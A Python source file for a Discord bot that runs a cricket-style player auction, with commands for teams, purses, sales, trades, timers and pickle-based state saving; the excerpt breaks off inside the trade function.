return trade_data_list
| logictraders/tradingkit | src/tradingkit/data/feed/public_kraken_feeder.py | public_kraken_feeder.py | py | 4,159 | python | en | code | 3 | github-code | 13 |
30569706292 | import discord
from discord.ui import Button, View
from discord import InteractionType
import os
import random
import copy
import asyncio
import random
import pytz
from datetime import datetime
import json
import pickle
from keep_alive import keep_alive
import csv
keep_alive()
timer_running = False
counter = 0
sales_channel = None
user_notifications = {}
# iterate through files to find highest numbered .pkl file
pkls = []
for files in os.listdir():
if files.endswith(".pkl"):
file = files.removesuffix(".pkl")
file = files.removeprefix("data_")
pkls.append(file)
print(pkls)
if len(pkls) != 0:
filename = str(max(pkls))
filename = "data_"+filename
else:
filename = None
def load_data(filename):
try:
with open(filename, 'rb') as file:
data = pickle.load(file)
return data
except FileNotFoundError:
# Handle the case where the file doesn't exist (e.g., for the first run)
return None
except Exception as e:
# Handle other exceptions, e.g., if the file format is invalid
print(f"Error loading data: {e}")
return None
# Function to save all relevant data to a pickle file
def save_data(data_to_save):
global counter
try:
# Increment the counter for the next file name
counter += 1
file_name = f'data_{counter}.pkl'
# Save the data to the pickle file
with open(file_name, 'wb') as file:
pickle.dump(data_to_save, file)
for i in range(1, counter-1):
file = f'data_{i}.pkl'
if os.path.exists(file):
os.remove(file)
print(f"Deleted {file}.")
print(f"Data saved to {file_name} successfully.")
except Exception as e:
print(f"Error saving data: {e}")
MAX_PURSE = 100
MAX_PLAYERS = 25
current_auction_set = None
current_player = None
current_player_price = None
unsold_players = set()
intents = discord.Intents.default()
intents.message_content = True
client = discord.Client(intents=intents)
teams = {}
full_team_names = {}
purse = {}
team_colors = {}
with open("auction_sets.json", "r") as players_file:
auction_sets = json.load(players_file)
copy_auction_sets = copy.deepcopy(auction_sets)
# Load base prices from base_prices.json
with open("base_prices.json", "r") as base_prices_file:
base_prices = json.load(base_prices_file)
# Load set colors from set_colors.json
with open("set_colors.json", "r") as set_colors_file:
embed_colors = json.load(set_colors_file)
# Function to check if a user has the 'Auctioneer' role
def is_auctioneer(user):
for role in user.roles:
if role.name == 'Auctioneer':
return True
return False
# Initialize a dictionary to store sale history
sale_history = []
# Define a function to add a sale to the history
ist = pytz.timezone('Asia/Kolkata')
# Function to get the current IST time as a string
def get_current_ist_time():
current_time = datetime.now(pytz.utc).astimezone(ist)
return current_time.strftime("%Y-%m-%d %H:%M:%S IST")
def get_event_timestamp():
return datetime.now(ist).strftime("%Y-%m-%d %H:%M:%S")
def add_sale(team_name, player_name, price):
sale_history.append({
'type': 'sale',
'timestamp': get_event_timestamp(),
'team_name': team_name,
'player_name': player_name,
'price': price
})
def add_trade(team1_name, team2_name, player1_name, player2_name):
sale_history.append({
'type': 'trade',
'timestamp': get_event_timestamp(),
'team_1': team1_name,
'team_2': team2_name,
'player_1': player1_name,
'player_2': player2_name
})
auction_data = {
'teams': teams,
'purse': purse,
'auction_sets': auction_sets,
'sale_history': sale_history,
'unsold_players': unsold_players,
'full_team_names': full_team_names,
'team_colors': team_colors,
'current_auction_set': current_auction_set,
'current_player': current_player,
'current_player_price': current_player_price,
}
#############################################################
# Events:
#############################################################
@client.event
async def on_ready():
global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, user_notifications, current_player_price, current_player, current_auction_set, filename, pkls
print('We have logged in as {0.user}'.format(client))
# Load data from the pickle file at the start of the bot
if pkls != []:
loaded_data = load_data(filename)
else:
loaded_data = None
for files in os.listdir():
if files.endswith(".pkl"):
os.remove(files)
if loaded_data is not None:
# Extract individual components as needed
teams = loaded_data.get('teams', {})
purse = loaded_data.get('purse', {})
auction_sets = loaded_data.get('auction_sets', auction_sets)
sale_history = loaded_data.get('sale_history', [])
unsold_players = loaded_data.get('unsold_players', set())
full_team_names = loaded_data.get('full_team_names', {})
team_colors = loaded_data.get('team_colors', team_colors)
current_player_price = loaded_data.get('current_player_price', None)
current_player = loaded_data.get('current_player', None)
current_auction_set = loaded_data.get('current_auction_set', None)
user_notifications = loaded_data.get('user_notifications', {})
# Extract more data as needed
else:
# Handle the case where no data was loaded (e.g., first run)
# Initialize data structures as needed
teams = {}
purse = {}
auction_sets = copy.deepcopy(copy_auction_sets)
full_team_names = {}
sale_history = []
unsold_players = set()
team_colors = {}
current_auction_set = None
current_player = None
current_player_price = None
user_notifications = {}
#############################################################
# Message:
#############################################################
@client.event
async def on_message(message):
global current_auction_set
global current_player
global sales_channel
if message.author == client.user:
return
content = message.content
user = message.author
if content.startswith('$'):
try:
cmd = content[1:]
# Reset auction
if cmd == 'ping':
# calculate ping time
ping = round(client.latency * 1000)
await message.channel.send('Pong! {}ms'.format(ping))
if cmd == 'reset' and is_auctioneer(user):
await reset_sets_teams(message.channel)
# Shows all sets
elif cmd == 'sets':
await show_sets(message.channel)
# Pops a player
elif cmd in auction_sets and is_auctioneer(user):
await pop_and_send(cmd, message.channel)
# Starts a timer
elif cmd.startswith('timer '):
cmd_args = cmd.split(' ')
await timer(cmd_args[1], message.channel)
elif cmd == 'timer':
await timer('10', message.channel)
# Adds a new team
elif cmd.startswith('add ') and is_auctioneer(user):
cmd_args = cmd.split(' ')
team_name = cmd_args[1]
color_arg = cmd_args[2] if len(cmd_args) > 2 else None
full_name = ' '.join(cmd_args[3:])
await add_team(team_name, full_name, color_arg, message.channel)
# Shows details of all teams
elif cmd == 'teams':
await show_teams(message.channel)
# Sells the player to a team
elif cmd.startswith('sell') and is_auctioneer(user):
cmd_args = cmd.split(' ')
team_name = cmd_args[1]
price = cmd_args[2]
name = ' '.join(cmd_args[3:])
await sell_team(team_name, price, name, message.channel)
# Shows specified team details
elif cmd.lower() in str(teams.keys()).lower():
await show_team(cmd, message.channel)
# Shows Help embed
elif cmd == 'help':
await show_help(message.channel)
# Shows specific set
elif cmd.startswith('set '):
cmd_args = cmd.split(' ')
set_name = cmd_args[1]
await show_set(set_name, message.channel)
# Shows sales and trades that occurred
elif cmd == 'sales':
await show_sales(message.channel)
# Sets Maximum purse for all teams
elif cmd.startswith('setmaxpurse ') and is_auctioneer(user):
cmd_args = cmd.split(' ')
if len(cmd_args) == 2:
await set_max_purse(cmd_args[1], message.channel)
else:
await message.channel.send(
"Invalid usage. Please use: $setmaxpurse <value>")
# Trade
elif cmd.startswith('trade ') and is_auctioneer(user):
cmd_args = cmd.split(' ')
if len(cmd_args) < 5:
# Invalid trade command, show an error message
embed = discord.Embed(title="Invalid Trade Command",
color=discord.Color.red())
embed.add_field(name="Usage",
value="$trade <team1> <team2> <player1> <player2>")
await message.channel.send(embed=embed)
else:
team1_name = cmd_args[1]
team2_name = cmd_args[2]
players = ' '.join(cmd_args[3:])
await trade(team1_name, team2_name, players, message.channel)
elif cmd.startswith('setmaxplayers ') and is_auctioneer(user):
cmd_args = cmd.split(' ')
if len(cmd_args) == 2:
await set_max_players(cmd_args[1], message.channel)
else:
await message.channel.send(
"Invalid usage. Please use: $setmaxplayers <value>")
# Remove player command
elif cmd.startswith('removeplayer ') and is_auctioneer(user):
cmd_args = cmd.split(' ')
if len(cmd_args) == 3:
team_name = cmd_args[1]
player_name = cmd_args[2]
await remove_player(team_name, player_name, message.channel)
else:
# Invalid usage of the removeplayer command
embed = discord.Embed(
title="Invalid Remove Player Command",
description="Usage: $removeplayer <team_name> <player_name>",
color=discord.Color.red())
await message.channel.send(embed=embed)
# Selling current player
elif cmd.startswith('sold ') and is_auctioneer(user):
global current_auction_set
global current_player
cmd_args = content.split(' ')
team = cmd_args[1]
price = cmd_args[2]
if current_player is not None:
await sell_team(team, price, current_player, message.channel)
else:
await message.channel.send(
"No player available to sell. Use $<set_name> to pop a player first."
)
# Requesting a player
elif cmd.startswith('request '):
cmd_args = cmd.split(' ')
if len(cmd_args) > 1:
requested_player = ' '.join(cmd_args[1:])
await request_player(user, requested_player, message.channel)
else:
await message.channel.send(
"Invalid usage. Please use: $request <player_name>")
# Marking current player as unsold
elif cmd == 'unsold' and is_auctioneer(user):
await unsold(message.channel)
# Getting a random unsold player
elif cmd == 'getunsold' and is_auctioneer(user):
await get_unsold(message.channel)
# Showing unsold players
elif cmd == 'showunsold':
await show_unsold(message.channel)
# Set the sales channel
elif cmd.startswith('saleschannel') and is_auctioneer(user):
args = cmd.split(' ')
if len(args) == 2:
channel_id = int(args[1])
channel = client.get_channel(channel_id)
if channel is not None:
sales_channel = channel
await message.channel.send(f"Sales channel set to {sales_channel}")
else:
await message.channel.send("Invalid channel ID.")
# Remove a team
elif cmd.startswith('removeteam') and is_auctioneer(user):
args = cmd.split(' ')
if len(args) == 2:
team_name = args[1]
await remove_team(team_name, message.channel)
else:
await message.channel.send("Invalid usage. Please use: $removeteam <team_name>")
# Export
elif cmd == 'export' and is_auctioneer(user):
await export(message.channel)
elif cmd.startswith('notify '):
cmd_args = cmd.split(' ')
players_to_notify = ' '.join(cmd_args[1:]).split(',')
players_to_notify = [player.strip()
for player in players_to_notify]
user_notifications[user.id] = players_to_notify
await message.author.send(
f"You will be notified when these players are live in auction: {', '.join(players_to_notify)}"
)
save_data({
'teams': teams,
'purse': purse,
'auction_sets': auction_sets,
'sale_history': sale_history,
'unsold_players': unsold_players,
'full_team_names': full_team_names,
'team_colors': team_colors,
'current_auction_set': current_auction_set,
'current_player': current_player,
'current_player_price': current_player_price,
'user_notifications': user_notifications
})
await message.delete()
except Exception as e:
print(e)
save_data({'teams': teams,
'purse': purse,
'auction_sets': auction_sets,
'sale_history': sale_history,
'unsold_players': unsold_players,
'full_team_names': full_team_names,
'team_colors': team_colors,
'current_auction_set': current_auction_set,
'current_player': current_player,
'current_player_price': current_player_price,
'user_notifications': user_notifications})
#############################################################
# Reset:
#############################################################
async def reset_sets_teams(channel):
# Create an embed for the confirmation message
confirmation_embed = discord.Embed(
title="Reset Confirmation",
description="WARNING: This action will reset all sets and teams.",
color=discord.Color.from_str("#FFFFFF"))
confirmation_embed.add_field(
name="Confirmation:", value="Are you sure you want to reset all sets and teams?")
# Send the confirmation embed
confirmation_message = await channel.send(embed=confirmation_embed)
confirm = Button(style=discord.ButtonStyle.green, label="Confirm")
cancel = Button(style=discord.ButtonStyle.red, label="Cancel")
view = View()
view.add_item(confirm)
view.add_item(cancel)
await confirmation_message.edit(view=view)
# Add reactions to the confirmation message
def check_stop(interaction):
return is_auctioneer(interaction.user) and interaction.message == confirmation_message
# Define a check function to check which button they clicked
async def confirmed(interaction):
global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, user_notifications, current_player_price, current_player, current_auction_set, filename, pkls
if interaction.message == confirmation_message and is_auctioneer(interaction.user):
teams = {}
purse = {}
auction_sets = copy.deepcopy(copy_auction_sets)
full_team_names = {}
sale_history = []
unsold_players = set()
team_colors = {}
current_auction_set = None
current_player = None
current_player_price = None
user_notifications = {}
save_data(auction_data)
success_embed = discord.Embed(
title="Reset Successful",
description="All sets and teams have been reset.",
color=discord.Color.green())
await channel.send(embed=success_embed)
await confirmation_message.delete()
return
async def cancel_check(interaction):
if interaction.message == confirmation_message and is_auctioneer(interaction.user):
cancel_embed = discord.Embed(title="Reset Canceled",
description="Reset operation canceled.",
color=discord.Color.red())
await channel.send(embed=cancel_embed)
await confirmation_message.delete()
return
confirm.callback = confirmed
cancel.callback = cancel_check
#############################################################
# Show Sets:
#############################################################
async def show_sets(channel):
embed = discord.Embed(title='Auction Sets', color=discord.Color.blue())
for set_name, players in auction_sets.items():
players_list = ', '.join(players)
embed.add_field(name=f'{set_name.capitalize()}: {base_prices[set_name]}',
value=players_list,
inline=False)
await channel.send(embed=embed)
#############################################################
# Show Set:
#############################################################
async def show_set(set_name, channel):
players = auction_sets[set_name]
players_message = f'Base Price: **{base_prices[set_name]}**\nRemaining players:\n\n'
for player in players:
players_message += f'**{player}**\n'
color_value = embed_colors.get(set_name, "blue")
if isinstance(color_value, str):
color = discord.Color.from_str(color_value)
else:
color = discord.Color(value=color_value)
embed = discord.Embed(title=f'{set_name.capitalize()}',
description=players_message,
color=color)
await channel.send(embed=embed)
#############################################################
# Set Max Purse:
#############################################################
async def set_max_purse(new_max_purse, channel):
global MAX_PURSE
try:
new_max_purse = float(new_max_purse)
if new_max_purse >= 0:
MAX_PURSE = new_max_purse
embed = discord.Embed(
title="Maximum Purse",
description=f"The maximum purse has been set to {MAX_PURSE}Cr.",
color=discord.Color.green())
await channel.send(embed=embed)
else:
embed = discord.Embed(
title="Maximum Purse",
description=f"Please provide a non-negative value.",
color=discord.Color.red())
await channel.send(embed=embed)
except ValueError:
embed = discord.Embed(
title="Maximum Purse",
description=f"Invalid value for the maximum purse. Please provide a numeric value.",
color=discord.Color.red())
await channel.send(embed=embed)
#############################################################
# Set Max Players:
#############################################################
async def set_max_players(new_max_players, channel):
global MAX_PLAYERS
try:
new_max_players = int(new_max_players)
if new_max_players >= 0:
MAX_PLAYERS = new_max_players
embed = discord.Embed(
title="Maximum Players",
description=f"The maximum players has been set to {MAX_PLAYERS}.",
color=discord.Color.green())
await channel.send(embed=embed)
else:
embed = discord.Embed(
title="Maximum Players",
description=f"Please provide a non-negative value.",
color=discord.Color.red())
await channel.send(embed=embed)
except ValueError:
embed = discord.Embed(
title="Maximum Players",
description=f"Invalid value for the maximum players. Please provide a numeric value.",
color=discord.Color.red())
await channel.send(embed=embed)
#############################################################
# Timer:
#############################################################
async def deny_timer(channel):
global timer_running
if timer_running:
embed = discord.Embed(
title="Timer Already Running",
description="A timer is currently running. You cannot start a new timer until the current one finishes.",
color=discord.Color.red())
msg = await channel.send(embed=embed)
await asyncio.sleep(2)
await msg.delete()
return True # Return True to indicate denial
else:
return False # Return False to indicate permission
async def timer(secs, channel):
global timer_running
if await deny_timer(channel):
return
if secs is None:
secs = 10
else:
secs = int(secs)
if secs > 30 or secs < 1:
embed = discord.Embed(
title="Timer",
description=f"Timer cannot be set for more than 30 seconds and less than 1 second.",
color=discord.Color.red())
await channel.send(embed=embed)
return
timer_running = True
def check_stop(interaction):
return is_auctioneer(interaction.user) and interaction.message == timer_message
async def update_timer_message(embed, remaining_time):
embed.description = f"Remaining time: {remaining_time}"
await timer_message.edit(embed=embed)
embed = discord.Embed(title="Timer",
description=f"Remaining time: {secs}",
color=discord.Color.blue())
timer_message = await channel.send(embed=embed)
view = View()
stop_button = Button(style=discord.ButtonStyle.danger, label="Stop")
view.add_item(stop_button)
# Set the initial value of the flag
timer_stopped = False
async def on_button_click(interaction):
nonlocal timer_stopped
global timer_running
if check_stop(interaction):
timer_stopped = True
timer_running = False
# Set the button callback
stop_button.callback = on_button_click
await timer_message.edit(view=view)
for remaining_time in range(secs - 1, 0, -1):
await asyncio.sleep(0.5) # Wait for 1 second per interval
await update_timer_message(embed, remaining_time)
# Check if the timer should be stopped
if timer_stopped:
await timer_message.edit(
embed=discord.Embed(
title="Timer",
description="Timer has been stopped!",
color=discord.Color.red()),
view=None)
timer_running = False
return
await timer_message.edit(embed=discord.Embed(
title="Timer", description="Time's up!", color=discord.Color.red()), view=None)
embed = discord.Embed(title="Timer",
description="Time's up!",
color=discord.Color.red())
embed.set_thumbnail(
url="https://cdn.discordapp.com/emojis/880003196339236884.png")
timer_running = False
await channel.send(embed=embed)
#############################################################
# Pop Players:
#############################################################
async def pop_and_send(set_name, channel):
global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, current_player_price, current_player, current_auction_set
if current_player is not None:
await complete_sale(channel)
return None
if set_name in auction_sets:
if auction_sets[set_name]:
player = random.choice(auction_sets[set_name])
auction_sets[set_name].remove(player)
current_auction_set = set_name
base_price = base_prices.get(set_name, 'Unknown')
current_player_price = base_price
color_value = embed_colors.get(set_name, "blue")
if isinstance(color_value, str):
color = discord.Color.from_str(color_value)
else:
color = discord.Color(value=color_value)
embed = discord.Embed(title=f"Player: {player}",
description=f'Base Price: {base_price}',
color=color)
player_image_file = f'images/{player}.png'
if os.path.isfile(player_image_file):
player_image = discord.File(
player_image_file, filename='Player.png')
embed.set_image(url="attachment://Player.png")
await channel.send(file=player_image, embed=embed)
else:
await channel.send(embed=embed)
current_player = player
# Send a DM to users who signed up for notifications
for user_id, players_to_notify in user_notifications.items():
if player in players_to_notify:
user = await client.fetch_user(user_id)
if user:
await user.send(f"**{player}** is live in the auction!")
else:
await channel.send(f'{set_name.capitalize()} is empty.')
else:
await channel.send(f'Invalid set name: {set_name.capitalize()}')
return None
#############################################################
# Adding Teams:
#############################################################
async def add_team(team_name, full_team_name, color_arg, channel):
if team_name not in teams:
if not full_team_name:
full_team_name = team_name
teams[team_name] = {} # Create a new team dictionary
full_team_names[team_name] = full_team_name # Store the full team name
purse[team_name] = MAX_PURSE # Assign a purse of 100 to the team
# Store the team color in the team_colors dictionary
if color_arg:
try:
color = discord.Color(int(
color_arg, 16)) # Convert hex color code to Color object
team_colors[team_name] = color
except ValueError:
pass # Ignore invalid color codes
# Create an embedded message to announce the team creation
embed = discord.Embed(
title=f'Team Created: {full_team_name}({team_name})',
description=f'Team "{full_team_name}" has been created with a purse of {MAX_PURSE:.2f}Cr.',
color=discord.Color.green())
# Optionally set the embed color based on the color argument
if color_arg:
embed.color = team_colors.get(team_name, discord.Color.green())
await channel.send(embed=embed)
else:
# Create an embedded message to indicate that the team already exists
embed = discord.Embed(
title=f'Team Already Exists: {team_name}',
description=f'Team {team_name} already exists as "{full_team_names[team_name]}".',
color=discord.Color.red())
await channel.send(embed=embed)
#############################################################
# Showing Teams:
#############################################################
async def show_teams(channel):
# Iterate through all existing teams and display their players and purses
team_info = []
team_logo = []
for team_name, players in teams.items():
purse_amount = purse.get(team_name, 0)
players_list = ", ".join(players.keys()) if players else "None"
# Get the stored team color or default to green
color = team_colors.get(team_name, discord.Color.green())
# Create an embedded message to display team information
embed = discord.Embed(
title=f'Team: {full_team_names[team_name]}',
description=f'Purse: **{purse_amount:.2f}Cr**\nPlayers: {players_list}\n',
color=color)
team_image_file = f'teams/{team_name}.png'
if os.path.isfile(team_image_file):
team_image = discord.File(
team_image_file, filename='Team.png')
embed.set_thumbnail(
url="attachment://Team.png")
await channel.send(file=team_image, embed=embed)
else:
await channel.send(embed=embed)
team_info.append(embed)
if team_info:
pass
else:
await channel.send('No teams created yet.')
#############################################################
# Selling Players:
#############################################################
async def sell_team(team_name, price, name, channel):
global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, current_player_price, current_player, current_auction_set, sales_channel
if team_name in teams:
player_price = int(price)
if len(teams[team_name]) >= MAX_PLAYERS:
# Create an embedded message to indicate that the team has reached the player limit
embed = discord.Embed(
title=f'Team Player Limit Reached: {team_name}',
description=f'Team {team_name} has reached the maximum player limit of {MAX_PLAYERS} players.',
color=discord.Color.red())
await channel.send(embed=embed)
else:
if player_price / 100 <= purse[team_name]:
teams[team_name][name] = player_price
purse[team_name] -= player_price / 100
add_sale(full_team_names[team_name], name, player_price / 100)
# Get the stored team color or default to green
color = team_colors.get(team_name, discord.Color.green())
# Create an embedded message to announce the player sale
embed = discord.Embed(
title=f'Player Sold: {name}',
description=f'**{name}** has been sold to **{full_team_names[team_name]}** for **{player_price/100:.2f}Cr**.',
color=color)
player_image_file = f'images/{name}.png'
team_image_file = f'teams/{team_name}.png'
files = [] # List to store files to be sent as attachments
if os.path.isfile(player_image_file):
player_image = discord.File(
player_image_file, filename='Player.png')
files.append(player_image)
# Player image as an attachment
embed.set_image(url="attachment://Player.png")
if os.path.isfile(team_image_file):
team_image = discord.File(
team_image_file, filename='Team.png')
files.append(team_image)
embed.set_thumbnail(
url="attachment://Team.png") # Team image as a thumbnail
await channel.send(files=files, embed=embed)
if sales_channel:
await sales_channel.send(embed=embed) # type: ignore
for set_name, players in auction_sets.items():
if name in players:
players.remove(name)
current_player = None # Reset the current player name
current_auction_set = None # Reset the current auction set name
else:
embed = discord.Embed(
title=f'Team Over Budget!: {team_name}',
description=f'Team "{team_name}" has exceeded their maximum budget.',
color=discord.Color.red())
await channel.send(embed=embed)
else:
# Create an embedded message to indicate that the team doesn't exist
embed = discord.Embed(title=f'Team Not Found: {team_name}',
description=f'Team "{team_name}" does not exist.',
color=discord.Color.red())
await channel.send(embed=embed)
##################################################################
# Unsold:
##################################################################
async def unsold(channel):
global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, current_player_price, current_player, current_auction_set, auction_data
price = 'Unknown'
if current_player:
price = current_player_price
unsold_players.add(
(current_player, price))
# Create an embedded message to confirm the player is marked as unsold
embed = discord.Embed(
title="Player Marked as Unsold",
description=f'{current_player} has been marked as unsold and saved for later use.',
color=discord.Color.greyple())
await channel.send(embed=embed)
current_player = None
current_player_price = None
else:
# Create an embedded message to indicate there is no current player to mark as unsold
embed = discord.Embed(title="No Player Unsold",
description="No player to mark as unsold.",
color=discord.Color.red())
await channel.send(embed=embed)
async def show_unsold(channel):
global current_auction_set
global current_player
global unsold_players
if unsold_players:
# Create a formatted message with unsold players and their base prices
unsold_message = "\n".join([
f'{player} (Base Price: {price})' for player, price in unsold_players
])
# Create an embedded message to display unsold players
embed = discord.Embed(title="Unsold Players",
description=unsold_message,
color=discord.Color.greyple())
await channel.send(embed=embed)
else:
# Create an embedded message to indicate there are no unsold players
embed = discord.Embed(title="No Unsold Players",
description="There are no unsold players available.",
color=discord.Color.greyple())
await channel.send(embed=embed)
async def get_unsold(channel):
global current_auction_set
global current_player
global unsold_players
if current_player is not None:
await complete_sale(channel)
return None
if unsold_players:
# Pop and send one random player from the unsold set
player, base_price = unsold_players.pop()
embed = discord.Embed(title=f"Unsold Player: {player}",
description=f'Base Price: {base_price}',
color=discord.Color.greyple())
await channel.send(embed=embed)
current_player = player
for user_id, players_to_notify in user_notifications.items():
if player in players_to_notify:
user = await client.fetch_user(user_id)
if user:
await user.send(f"**{player}** is live in the auction!")
else:
# Create an embedded message to indicate there are no unsold players
embed = discord.Embed(title="No Unsold Players",
description="There are no unsold players available.",
color=discord.Color.greyple())
await channel.send(embed=embed)
current_player = None
##################################################################
# Removing Players:
##################################################################
async def remove_player(team_name, player_name, channel):
if team_name in teams:
if player_name in teams[team_name]:
# Get the price of the player to refund the team's purse
player_price = teams[team_name][player_name]
purse[team_name] += player_price / 100
# Remove the player from the team's roster
del teams[team_name][player_name]
for sale in sale_history:
if sale["team_name"] == full_team_names[team_name] and sale[
"player_name"] == player_name:
sale_history.remove(sale)
# Create an embedded message to announce the player removal
embed = discord.Embed(
title=f'Player Removed: {player_name}',
description=f'{player_name} has been removed from Team: {full_team_names[team_name]}.',
color=discord.Color.green())
await channel.send(embed=embed)
else:
# Create an embedded message to indicate that the player is not found in the team
embed = discord.Embed(
title=f'Player Not Found: {player_name}',
description=f'{player_name} is not found in Team: {full_team_names[team_name]}.',
color=discord.Color.red())
await channel.send(embed=embed)
else:
# Create an embedded message to indicate that the team doesn't exist
embed = discord.Embed(title=f'Team Not Found: {team_name}',
description=f'Team "{team_name}" does not exist.',
color=discord.Color.red())
await channel.send(embed=embed)
##################################################################
# Removing teams:
##################################################################
async def remove_team(team_name, channel):
global teams
global unsold_players
# Check if the team exists
if team_name not in teams:
embed = discord.Embed(title="Remove Team Failed",
color=discord.Color.red())
embed.add_field(
name="Error", value=f"The team '{team_name}' does not exist.")
await channel.send(embed=embed)
return
# Add all players from the team to the unsold_players set with a base price of 1 Cr
for player_name in teams[team_name]:
unsold_players.add((player_name, 1))
# Remove the team from the teams dictionary
del teams[team_name]
embed = discord.Embed(title="Remove Team Successful",
color=discord.Color.green())
embed.add_field(name="Team Removed",
value=f"The team '{team_name}' has been removed, and all its players are set as unsold at 1 Cr.")
await channel.send(embed=embed)
##################################################################
# Requesting Players:
##################################################################
request_semaphore = asyncio.Semaphore(1)
async def request_player(user, player_name, channel):
global auction_sets
global unsold_players
global current_player
# Attempt to acquire the semaphore
async with request_semaphore:
# Check if there is a current player being auctioned
if current_player is not None:
embed = discord.Embed(
title=f"Request Denied for {player_name}",
description=f"A player is currently being auctioned: {current_player}",
color=discord.Color.red()
)
await channel.send(embed=embed)
return
# Check if the requested player is in the current auction set
if current_player == player_name:
embed = discord.Embed(
title=f"Requested Player: {player_name}",
description="This player is currently in the auction set.",
color=discord.Color.red()
)
await channel.send(embed=embed)
return
# Send a message indicating that the request is pending confirmation
confirmation_embed = discord.Embed(
title=f'Request for **{player_name}**',
description=f'{user} is requesting for **{player_name}** to be put on sale.',
color=discord.Color.red()
)
confirmation_embed.add_field(
name="Auctioneer to confirm:",
value="Please confirm or deny this request.",
inline=False
)
def check_stop(interaction):
return is_auctioneer(interaction.user) and interaction.message == confirmation_message
# Send the confirmation embed
confirmation_message = await channel.send(embed=confirmation_embed)
confirm = Button(style=discord.ButtonStyle.green, label="Confirm")
cancel = Button(style=discord.ButtonStyle.red, label="Cancel")
view = View()
view.add_item(confirm)
view.add_item(cancel)
await confirmation_message.edit(view=view)
# Define a check function to check which button they clicked
async def confirmed(interaction):
# Check if the requested player is in any of the auction sets
global current_player
await confirmation_message.delete()
for set_name, players in auction_sets.items():
if player_name in players:
# Send the player's card
base_price = base_prices.get(set_name, 'Unknown')
color_value = embed_colors.get(set_name, "blue")
if isinstance(color_value, str):
color = discord.Color.from_str(color_value)
else:
color = discord.Color(value=color_value)
embed = discord.Embed(
title=f"**{player_name}**",
description=f"Base Price: {base_price}\n Set: {set_name}",
color=color
)
player_image_file = f'images/{player_name}.png'
if os.path.isfile(player_image_file):
player_image = discord.File(
player_image_file, filename='Player.png')
embed.set_image(url="attachment://Player.png")
await channel.send(file=player_image, embed=embed)
else:
await channel.send(embed=embed)
for user_id, players_to_notify in user_notifications.items():
if player_name in players_to_notify:
user = await client.fetch_user(user_id)
if user:
await user.send(f"**{player_name}** is live in the auction!")
# Remove the player from the auction set
current_player = player_name
players.remove(player_name)
return
# Check if the requested player is in the unsold players set
for player, base_price in unsold_players:
if player == player_name:
# Send the player's card
embed = discord.Embed(
title=f"**{player_name}**",
description=f"Base Price: {base_price},\n Set: Unsold Players",
color=discord.Color.greyple()
)
await channel.send(embed=embed)
# Remove the player from the unsold players set
current_player = player
for user_id, players_to_notify in user_notifications.items():
if player in players_to_notify:
user = await client.fetch_user(user_id)
if user:
await user.send(f"**{player}** is live in the auction!")
unsold_players.remove((player, base_price))
return
# If the player is not found in either set, send a message
embed = discord.Embed(
title=f"Player Not Found: {player_name}",
description="The requested player was not found in the auction sets or the unsold players set.",
color=discord.Color.red()
)
await channel.send(embed=embed)
async def cancel_check(interaction):
cancel_embed = discord.Embed(
title="Denied request",
description=f"Request denied for **{player_name}**.",
color=discord.Color.red()
)
await channel.send(embed=cancel_embed)
await confirmation_message.delete()
return
confirm.callback = confirmed
cancel.callback = cancel_check
##################################################################
# Showing Team:
##################################################################
async def show_team(team_name, channel):
# Convert the provided team_name to lowercase to handle case-insensitive lookup
team_name_lower = team_name.lower()
if team_name_lower in map(str.lower, teams):
# Find the original case team name based on the lowercase version
original_team_name = next(key for key in teams
if key.lower() == team_name_lower)
players_info = []
count = 0
for player, price in teams[original_team_name].items():
count += 1
players_info.append(
f'{count}.**{player}({price/100}Cr)**')
purse_amount = purse.get(original_team_name, 0)
full_team_name = full_team_names.get(original_team_name,
original_team_name)
if players_info:
players_message = "\n".join(players_info)
else:
players_message = "No players bought by this team."
embed = discord.Embed(
title=f'Team: {full_team_name}',
description=f'**Remaining Purse: {purse_amount}**\n\nPlayers:\n{players_message}',
color=team_colors.get(original_team_name, discord.Color.green()))
team_image_file = f'teams/{team_name}.png'
if os.path.isfile(team_image_file):
team_image = discord.File(
team_image_file, filename='Team.png')
embed.set_thumbnail(
url="attachment://Team.png")
await channel.send(file=team_image, embed=embed)
else:
await channel.send(embed=embed)
else:
# Create an embedded message to indicate that the team doesn't exist
embed = discord.Embed(title=f'Team Not Found: {team_name}',
description=f'Team "{team_name}" does not exist.',
color=discord.Color.red())
await channel.send(embed=embed)
##################################################################
# Sale History:
##################################################################
async def show_sales(channel):
if sale_history:
# Sort the sale history by timestamp
sorted_history = sorted(sale_history, key=lambda x: x['timestamp'])
# Split the sorted_history into chunks of 30 entries each
chunk_size = 30
chunks = [
sorted_history[i:i + chunk_size]
for i in range(0, len(sorted_history), chunk_size)
]
for chunk in chunks:
history_message = ""
for entry in chunk:
timestamp = entry["timestamp"]
if entry["type"] == "sale":
history_message += f'[{timestamp} IST] **{entry["player_name"]}** sold to **{entry["team_name"]}** for **{entry["price"]}Cr**\n'
elif entry["type"] == "trade":
history_message += f'[{timestamp} IST] **{entry["team_1"]}** traded **{entry["player_1"]}** to **{entry["team_2"]}** for **{entry["player_2"]}**\n'
# Create an embedded message to display the combined sales message for this chunk
embed = discord.Embed(title='Sales and Trade History',
description=history_message,
color=discord.Color.blue())
await channel.send(embed=embed)
else:
embed = discord.Embed(title='Sales and Trade History',
description='No sales or trades have been made yet.',
color=discord.Color.blue())
await channel.send(embed=embed)
##################################################################
# Trade:
##################################################################
async def trade(team1_name, team2_name, players, channel):
global sales_channel
# Split the players argument into two player names using a delimiter ("/")
player_names = players.split('/')
if len(player_names) != 2:
embed = discord.Embed(title="Invalid Trade Command",
color=discord.Color.red())
embed.add_field(name="Usage",
value="$trade <team1> <team2> <player1> / <player2>")
await channel.send(embed=embed)
return
player1_name = player_names[0].strip()
player2_name = player_names[1].strip()
if player1_name.isnumeric() or player2_name.isnumeric():
if player1_name.isnumeric():
player1_value = int(player1_name)
player2_value = teams[team2_name][player2_name]
if (purse[team1_name] - player1_value/100 < 0):
embed = discord.Embed(
title="Trade Failed", color=discord.Color.red())
embed.add_field(name="Error",
value=f"**{team1_name}** cannot afford this trade.")
await channel.send(embed=embed)
return
del teams[team2_name][player2_name]
teams[team1_name][player2_name] = player2_value
purse[team2_name] = purse[team2_name] + player1_value / 100
purse[team1_name] = purse[team1_name] - player1_value / 100
add_trade(full_team_names[team1_name], full_team_names[team2_name],
